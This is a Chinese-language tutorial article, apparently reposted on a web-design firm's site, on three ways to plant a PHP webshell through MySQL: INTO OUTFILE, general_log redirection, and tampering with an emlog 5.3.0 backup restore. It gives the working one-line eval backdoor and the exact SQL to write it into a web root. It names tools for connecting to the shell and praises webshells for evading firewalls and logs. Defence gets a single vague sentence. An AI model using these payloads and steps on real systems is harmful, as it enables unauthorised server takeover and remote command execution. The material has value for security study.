這篇文章主要介紹“數(shù)據(jù)庫上傳WebShell的方式有哪些”，在日常操作中，相信很多人在數(shù)據(jù)庫上傳WebShell的方式有哪些問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”數(shù)據(jù)庫上傳WebShell的方式有哪些”的疑惑有所幫助！接下來，請跟著小編一起來學習吧！

創(chuàng)新互聯(lián)建站專業(yè)為企業(yè)提供古藺網站建設、古藺做網站、古藺網站設計、古藺網站制作等企業(yè)網站建設、網頁設計與制作、古藺企業(yè)網站模板建站服務，十載古藺做網站經驗，不只是建網站，更提供有價值的思路和整體網絡服務。

一、什么是WebShell？

簡單的說來，webshell就是一個asp或php木馬后門，黑客在入侵了一個網站后，常常在將這些asp或php木馬后門文件放置在網站服務器的web目錄中，與正常的網頁文件混在一起。然后黑客就可以用web的方式，通過asp或php木馬后門控制網站服務器，包括上傳下載文件、查看數(shù)據(jù)庫、執(zhí)行任意程序命令等。

為了更好理解WebShell我們學習兩個概念：

什么是“木馬”？

“木馬”全稱是“特洛伊木馬(Trojan Horse)”，原指古希臘士兵藏在木馬內進入敵方城市從而占領敵方城市的故事。

在Internet上，“特洛伊木馬”指一些程序設計人員在其可從網絡上下載 (Download)的應用程序或游戲中，包含了可以控制用戶的計算機系統(tǒng)的程序，可能造成用戶的系統(tǒng)被破壞甚至癱瘓。

什么是后門？

大家都知道，一臺計算機上有65535個端口，那么如果把計算機看作是一間屋子，那么這65535個端口就可以它看做是計算機為了與外界連接所開的65535 扇門。每個門的背后都是一個服務。有的門是主人特地打開迎接客人的（提供服務），有的門是主人為了出去訪問客人而開設的（訪問遠程服務）——理論上，剩下的其他門都該是關閉著的，但偏偏由于各種原因，很多門都是開啟的。于是就有好事者進入，主人的隱私被刺探，生活被打擾，甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。

webshell的優(yōu)點

webshell 最大的優(yōu)點就是可以穿越防火墻，由于與被控制的服務器或遠程主機交換的數(shù)據(jù)都是通過80端口傳遞的，因此不會被防火墻攔截。并且使用webshell一般不會在系統(tǒng)日志中留下記錄，只會在網站的web日志中留下一些數(shù)據(jù)提交記錄，沒有經驗的管理員是很難看出入侵痕跡的。

二、WebShell的分類

根據(jù)文件大小分類：大馬和小馬(通常指的是一句話木馬，能夠使用菜刀這類工具去直接連接它) 

根據(jù)腳本名稱分類：jsp、asp、aspx、php

小馬的功能比較單一，大馬的功能比較豐富，集成上傳下載、數(shù)據(jù)庫提權、CMD命令操作、克隆、代理等功能，如下圖所示。

三、利用數(shù)據(jù)庫上傳WebShell的三種方式

（1）into out file寫入

數(shù)據(jù)庫中secure_file_priv支持web目錄文件導出、數(shù)據(jù)庫用戶File權限、獲取物理路徑；該參數(shù)有三種狀態(tài)：

secure_file_priv=NULL;

表示寫入開關關閉；

secure_file_priv="";

表示寫入開關打開，且可以寫入任意目錄；

secure_file_priv="C:/phpStudy/PHPTutorial/WWW";

表示寫入開關打開，且寫入到指定的路徑下，如果寫入路徑不是Web路徑，也無法使用該功能寫入WehShell。

該開關無法通過SQL命令

set global secure_file_priv="C:/phpStudy/PHPTutorial/WWW"

參數(shù)打開開關，僅能通過修改MySQL.ini配置文件修改，局限性比較大。

如果開關已經打開，正確寫入WebShell的SQL語句如下：

select "<?php @eval($_POST['cmd']);?>" into outfile "C://phpStudy//PHPTutorial//WWW//shell.php"

然后利用此菜刀、蟻劍或者冰蝎鏈接即可

（2）通過general_log日志寫入

可以通過修改日志開關即可上傳webshell，該方式需要數(shù)據(jù)庫root權限即可，通過SQL語句即可打開general_log開關并設置日志位置（需要提前知道Web的根路徑位置）；

修改完畢后，通過

select "<?php @eval($_POST['cmd']);?>"

即可寫入WebShell，寫入后的php文件內容如下圖所示

（3）通過備份數(shù)據(jù)庫漏洞寫入

數(shù)據(jù)庫備份為大多數(shù)CMS后臺管理頁面必備的功能，但是如果后臺校驗不嚴格，容易通過恢復備份方式上傳WebShell，以下以emlog的CMS講，測試版本5.3.0

 3.1查看web路徑地址

直接在管理頁面，點擊更多信息

在出來的phpinfo頁面搜索document_root即可

3.2 先備份數(shù)據(jù)庫

利用管理頁面的數(shù)據(jù)庫備份功能先備份數(shù)據(jù)庫

3.3修改備份文件內容

打開備份的SQL文件，在最后語句之前添加以下SQL語句

通過into outfile寫入webshell；最后通過菜刀鏈接即可。

四、如何防御WebShell？

數(shù)據(jù)庫應用應做好安全加固，不該開的開關盡量不要打開；同時做好數(shù)據(jù)庫備份和回復的后臺校驗工作，平時做好日常安全防護。

到此，關于“數(shù)據(jù)庫上傳WebShell的方式有哪些”的學習就結束了，希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習，快去試試吧！若想繼續(xù)學習更多相關知識，請繼續(xù)關注創(chuàng)新互聯(lián)網站，小編會繼續(xù)努力為大家?guī)砀鄬嵱玫奈恼拢?/p>

文章題目：數(shù)據(jù)庫上傳WebShell的方式有哪些
路徑分享：http://jinyejixie.com/article2/psioic.html

成都網站建設公司_創(chuàng)新互聯(lián)，為您提供動態(tài)網站、全網營銷推廣、移動網站建設、網站排名、網站設計公司、網站內鏈

廣告

聲明：本網站發(fā)布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創(chuàng)新互聯(lián)